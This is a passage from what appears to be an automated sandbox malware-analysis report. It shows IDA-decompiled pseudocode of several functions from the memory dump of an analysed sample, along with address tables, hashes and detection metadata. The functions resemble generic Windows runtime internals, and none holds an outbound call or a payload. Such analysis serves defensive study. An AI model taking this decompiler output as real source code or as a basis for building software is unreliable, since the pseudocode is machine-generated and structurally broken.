						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0xb153e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0xb153e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0xa0bc46;
						_t48 = E00AA7B9C(0xb153e8, 0xa0bc46, _t67, 0xb153e8, _t70,  &_v140);
					}
				}
				return E00A6B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                              0x00a68ec7
                                                              0x00a68ed9
                                                              0x00a68edc
                                                              0x00a68ee6
                                                              0x00a68ee9
                                                              0x00a68eee
                                                              0x00a68efc
                                                              0x00a68f08
                                                              0x00aa1349
                                                              0x00aa1353
                                                              0x00aa135d
                                                              0x00aa1366
                                                              0x00aa136f
                                                              0x00aa1375
                                                              0x00aa137c
                                                              0x00aa1385
                                                              0x00aa1390
                                                              0x00aa1391
                                                              0x00aa139c
                                                              0x00aa139d
                                                              0x00aa13a6
                                                              0x00aa13ac
                                                              0x00aa13b2
                                                              0x00aa13b5
                                                              0x00aa13bc
                                                              0x00aa13bf
                                                              0x00aa13c2
                                                              0x00aa13c5
                                                              0x00aa13c8
                                                              0x00aa13cb
                                                              0x00aa13ce
                                                              0x00aa13d1
                                                              0x00aa13d4
                                                              0x00aa13d7
                                                              0x00aa13da
                                                              0x00aa13dd
                                                              0x00aa13e0
                                                              0x00aa13e3
                                                              0x00aa13e6
                                                              0x00aa13e9
                                                              0x00aa13f6
                                                              0x00aa1400
                                                              0x00aa1400
                                                              0x00a68f08
                                                              0x00a68f32

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e16de0e2a205a98d71e647ae70a09be73cd9b27e0c6535063b72fa4ab100da3e
                                                              • Instruction ID: 5ab5d2b8f810caa761391aeb5a62a26a1c778d09ca4e08d112f9eaf946cebe80
                                                              • Opcode Fuzzy Hash: e16de0e2a205a98d71e647ae70a09be73cd9b27e0c6535063b72fa4ab100da3e
                                                              • Instruction Fuzzy Hash: 6B41A2B1D002189FDB20CFAAD981AEDFBF8FB48310F5081AEE519A7240DB745A84CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A64A2C Relevance: .1, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 58%
                                                              			E00A64A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0xb1d360 ^ _t62;
				_v8 =  *0xb1d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E00A42280(_t26, 0xb18608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E00A3FFB0(_t41, _t51, 0xb18608);
						L2:
						 *0xb1b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E00A6B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E00A42280(_t28, 0xb18608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E00A3FFB0(_t42, _t53, 0xb18608);
							if(_t53 != 0) {
								L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E00A3FFB0(_t41, _t51, 0xb18608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                              0x00a64a2c
                                                              0x00a64a34
                                                              0x00a64a3c
                                                              0x00a64a3e
                                                              0x00a64a48
                                                              0x00a64a4b
                                                              0x00a64a4d
                                                              0x00a64a51
                                                              0x00a64a9c
                                                              0x00000000
                                                              0x00000000
                                                              0x00a64aa3
                                                              0x00a64aa8
                                                              0x00a64aad
                                                              0x00a64ab1
                                                              0x00a64ade
                                                              0x00a64ae3
                                                              0x00a64a5a
                                                              0x00a64a62
                                                              0x00a64a6a
                                                              0x00a64a6e
                                                              0x00a9f203
                                                              0x00a64a84
                                                              0x00a64a88
                                                              0x00a64a89
                                                              0x00a64a8a
                                                              0x00a64a95
                                                              0x00a64a95
                                                              0x00a64a79
                                                              0x00a64a80
                                                              0x00a64af2
                                                              0x00a64af4
                                                              0x00a64af9
                                                              0x00a64aff
                                                              0x00a64b01
                                                              0x00a64b03
                                                              0x00a64b08
                                                              0x00a9f20a
                                                              0x00a9f212
                                                              0x00a9f216
                                                              0x00a9f216
                                                              0x00a64b08
                                                              0x00a64b13
                                                              0x00a64b1a
                                                              0x00a9f229
                                                              0x00a9f229
                                                              0x00a64b1a
                                                              0x00a64a82
                                                              0x00000000
                                                              0x00a64a82
                                                              0x00a64ab7
                                                              0x00a64acd
                                                              0x00a64acd
                                                              0x00a64ad5
                                                              0x00a64ada
                                                              0x00000000
                                                              0x00a64ada
                                                              0x00a64ac2
                                                              0x00a64acb
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a64acb
                                                              0x00a64a53
                                                              0x00a64a53
                                                              0x00a64a58
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fff8b5825038c47f42239cc97c9011d4894892bf5693fecb6bcdd3782bbbcd99
                                                              • Instruction ID: bb524f271d97c96e39419afde434e929f5c9bd5631815fec0db458f2bcdf0863
                                                              • Opcode Fuzzy Hash: fff8b5825038c47f42239cc97c9011d4894892bf5693fecb6bcdd3782bbbcd99
                                                              • Instruction Fuzzy Hash: 80314132285310AFCB219F94CA81BAABBF4FFD8B50F504569F8524B291CB70DC40CB95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A5E730 Relevance: .1, Instructions: 89COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 74%
                                                              			E00A5E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E00A69670() < 0) {
					L00A7DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0xb17b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L00A44620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M00A5E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                                              0x00a5e730
                                                              0x00a5e736
                                                              0x00a5e738
                                                              0x00a5e73d
                                                              0x00a5e73e
                                                              0x00a5e740
                                                              0x00a5e749
                                                              0x00a5e765
                                                              0x00a5e76a
                                                              0x00a5e76b
                                                              0x00a5e76c
                                                              0x00a5e76d
                                                              0x00a5e76e
                                                              0x00a5e76f
                                                              0x00a5e775
                                                              0x00a5e777
                                                              0x00a5e77e
                                                              0x00a9b675
                                                              0x00a5e784
                                                              0x00a5e784
                                                              0x00a5e789
                                                              0x00a5e7a8
                                                              0x00a5e7ac
                                                              0x00a5e807
                                                              0x00a5e7ae
                                                              0x00a5e7ae
                                                              0x00a5e7b1
                                                              0x00a5e7b4
                                                              0x00a5e7b9
                                                              0x00a5e7c0
                                                              0x00a5e7c4
                                                              0x00a5e7ca
                                                              0x00a5e7cc
                                                              0x00000000
                                                              0x00a5e7d3
                                                              0x00a5e7d6
                                                              0x00000000
                                                              0x00000000
                                                              0x00a5e7ff
                                                              0x00a5e802
                                                              0x00000000
                                                              0x00000000
                                                              0x00a5e7f9
                                                              0x00a5e7fc
                                                              0x00000000
                                                              0x00000000
                                                              0x00a5e7f3
                                                              0x00a5e7f6
                                                              0x00000000
                                                              0x00000000
                                                              0x00a5e7ed
                                                              0x00a5e7f0
                                                              0x00000000
                                                              0x00000000
                                                              0x00a5e7e7
                                                              0x00a5e7ea
                                                              0x00000000
                                                              0x00000000
                                                              0x00a9b685
                                                              0x00a9b688
                                                              0x00000000
                                                              0x00000000
                                                              0x00a9b682
                                                              0x00000000
                                                              0x00000000
                                                              0x00a5e7cc
                                                              0x00a5e7d9
                                                              0x00a5e7dc
                                                              0x00a5e7de
                                                              0x00a5e7de
                                                              0x00a5e7ac
                                                              0x00a5e7e4
                                                              0x00a5e74b
                                                              0x00a5e751
                                                              0x00a5e759
                                                              0x00a5e761
                                                              0x00a5e761

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 65866cda4d6a5bc26b036b1e2fa140f46e69f4988da041416e5e1b4e3512d184
                                                              • Instruction ID: db069fe08c7a3f4202a4ccc7846d56278e6d858cf720c716c27d18721d55d9c0
                                                              • Opcode Fuzzy Hash: 65866cda4d6a5bc26b036b1e2fa140f46e69f4988da041416e5e1b4e3512d184
                                                              • Instruction Fuzzy Hash: 39316B75A14249AFD748CF68D941B9ABBF8FB09314F148266F908CB341D631ED84CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A5BC2C Relevance: .1, Instructions: 88COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 67%
                                                              			E00A5BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0xb16100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E00A42280(0xd, 0x376f1a0);
				_t41 =  *0xb160f8; // 0x0
				if(_t41 != 0) {
					 *0xb160f8 =  *_t41;
					 *0xb160fc =  *0xb160fc + 0xffff;
				}
				E00A3FFB0(_t41, 0x800, 0x376f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0xb160f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L00A44620(0xb16100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0xb16100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                              0x00a5bc36
                                                              0x00a5bc42
                                                              0x00a5bc45
                                                              0x00a5bc4a
                                                              0x00a5bd35
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a5bc50
                                                              0x00a5bc50
                                                              0x00a5bc58
                                                              0x00a5bc5a
                                                              0x00a5bc60
                                                              0x00000000
                                                              0x00000000
                                                              0x00a9a4f2
                                                              0x00a9a4f6
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a9a4fc
                                                              0x00a5bc79
                                                              0x00a5bc7e
                                                              0x00a5bc86
                                                              0x00a5bd16
                                                              0x00a5bd20
                                                              0x00a5bd20
                                                              0x00a5bc8d
                                                              0x00a5bc94
                                                              0x00a5bcbd
                                                              0x00a5bcca
                                                              0x00a5bccb
                                                              0x00a5bccc
                                                              0x00a5bccd
                                                              0x00a5bcce
                                                              0x00a5bcd4
                                                              0x00a5bcea
                                                              0x00a5bcee
                                                              0x00a5bcf2
                                                              0x00a5bd00
                                                              0x00a5bd04
                                                              0x00000000
                                                              0x00a5bc96
                                                              0x00a5bcab
                                                              0x00a5bcaf
                                                              0x00a5bd2c
                                                              0x00a5bd2c
                                                              0x00a5bd09
                                                              0x00000000
                                                              0x00a5bd09
                                                              0x00a5bcb1
                                                              0x00a5bcb5
                                                              0x00a5bcbb
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a5bcbb

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 787c55d615f14bec8ec5f0d6dff7eac20185e5e36c3308ec2da0915809f13785
                                                              • Instruction ID: 9694f0929aa94086f1e123da5185ec55f45d43f77da9f870a2489076c512b78d
                                                              • Opcode Fuzzy Hash: 787c55d615f14bec8ec5f0d6dff7eac20185e5e36c3308ec2da0915809f13785
                                                              • Instruction Fuzzy Hash: 6131DD36A206159BCB11DF58D8C1BA673B4FB18313F5540B9ED44EB241EB74DE49CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A51DB5 Relevance: .1, Instructions: 87COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 60%
                                                              			E00A51DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E00A4F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L00A44620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E00A4F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                              0x00a51dc2
                                                              0x00a51dc5
                                                              0x00a51dc7
                                                              0x00a51dcc
                                                              0x00a51dce
                                                              0x00a51dd6
                                                              0x00a51ddf
                                                              0x00a51de0
                                                              0x00a51de1
                                                              0x00a51de5
                                                              0x00a51de8
                                                              0x00a51def
                                                              0x00a51df0
                                                              0x00a51df6
                                                              0x00a51df7
                                                              0x00a51dfe
                                                              0x00a51e1a
                                                              0x00000000
                                                              0x00000000
                                                              0x00a51e0b
                                                              0x00a51e12
                                                              0x00a51e12
                                                              0x00a51e00
                                                              0x00a51e00
                                                              0x00a51e05
                                                              0x00a51e1e
                                                              0x00a51e23
                                                              0x00a9570f
                                                              0x00a95713
                                                              0x00000000
                                                              0x00000000
                                                              0x00a95719
                                                              0x00a95719
                                                              0x00a51e2c
                                                              0x00a51e2d
                                                              0x00a51e2e
                                                              0x00a51e2f
                                                              0x00a51e31
                                                              0x00a51e32
                                                              0x00a51e35
                                                              0x00a51e3d
                                                              0x00a95723
                                                              0x00a9573d
                                                              0x00a9573d
                                                              0x00000000
                                                              0x00a95723
                                                              0x00a51e49
                                                              0x00a51e4e
                                                              0x00a51e4e
                                                              0x00a51e09
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                              • Instruction ID: a943802a38f606a27dd6645e5c8e4d9c959513b5d7c82ff05b6693c4d14579d8
                                                              • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                              • Instruction Fuzzy Hash: 7D217736A00218ABD721CF99CD82FBABBB9FB85781F114065ED019B210D634AE01CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A29100 Relevance: .1, Instructions: 87COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 76%
                                                              			E00A29100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0xaff6e8);
				E00A7D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E00AF88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E00A7D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0xb186c0; // 0x4d07b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0xb186b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E00A42280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E00AF88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E00A6AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0xb1b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0xb184c0;
										if(_t69 >=  *0xb184c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E00AF9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E00A2922A(_t82);
							_t53 = E00A47D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E00AF8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0xb186c0; // 0x4d07b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0xb186b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0xb186bc;
										_t72 = 0xb186b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E00A29240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0xb186c4;
									_t72 = 0xb186c0;
									L18:
									E00A59B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                              0x00a29100
                                                              0x00a29100
                                                              0x00a29100
                                                              0x00a29100
                                                              0x00a29102
                                                              0x00a29107
                                                              0x00a2910c
                                                              0x00a29110
                                                              0x00a29115
                                                              0x00a29136
                                                              0x00a29143
                                                              0x00a837e4
                                                              0x00a837e4
                                                              0x00a29149
                                                              0x00a2914e
                                                              0x00a2914e
                                                              0x00a29117
                                                              0x00a2911d
                                                              0x00000000
                                                              0x00000000
                                                              0x00a2911f
                                                              0x00a29125
                                                              0x00000000
                                                              0x00a29151
                                                              0x00a29158
                                                              0x00a2915d
                                                              0x00a29161
                                                              0x00a29168
                                                              0x00a83715
                                                              0x00000000
                                                              0x00a2916e
                                                              0x00a2916e
                                                              0x00a29175
                                                              0x00a29177
                                                              0x00a2917e
                                                              0x00a2917f
                                                              0x00a29182
                                                              0x00a29182
                                                              0x00a29187
                                                              0x00a29187
                                                              0x00a2918a
                                                              0x00a2918d
                                                              0x00a2918f
                                                              0x00a29192
                                                              0x00a29195
                                                              0x00a29198
                                                              0x00a29198
                                                              0x00a29198
                                                              0x00a2919a
                                                              0x00000000
                                                              0x00000000
                                                              0x00a8371f
                                                              0x00a83721
                                                              0x00a83727
                                                              0x00a8372f
                                                              0x00a83733
                                                              0x00a83735
                                                              0x00a83738
                                                              0x00a8373b
                                                              0x00a8373d
                                                              0x00a83740
                                                              0x00000000
                                                              0x00000000
                                                              0x00a83746
                                                              0x00a83749
                                                              0x00000000
                                                              0x00000000
                                                              0x00a8374f
                                                              0x00a83751
                                                              0x00000000
                                                              0x00000000
                                                              0x00a83757
                                                              0x00a83759
                                                              0x00a8375c
                                                              0x00a8375c
                                                              0x00a8375e
                                                              0x00a8375e
                                                              0x00a83761
                                                              0x00a83764
                                                              0x00000000
                                                              0x00000000
                                                              0x00a83766
                                                              0x00a83768
                                                              0x00a837a3
                                                              0x00a837a3
                                                              0x00a837a5
                                                              0x00a837a7
                                                              0x00a837ad
                                                              0x00a837b0
                                                              0x00a837b2
                                                              0x00a837bc
                                                              0x00a837c2
                                                              0x00a837c2
                                                              0x00a837b2
                                                              0x00a29187
                                                              0x00a29187
                                                              0x00a2918a
                                                              0x00a2918d
                                                              0x00a2918f
                                                              0x00a29192
                                                              0x00a29195
                                                              0x00000000
                                                              0x00a29195
                                                              0x00000000
                                                              0x00a29187
                                                              0x00a8376a
                                                              0x00a8376a
                                                              0x00a8376c
                                                              0x00a8376c
                                                              0x00a8376f
                                                              0x00a83775
                                                              0x00000000
                                                              0x00000000
                                                              0x00a83777
                                                              0x00a83779
                                                              0x00000000
                                                              0x00000000
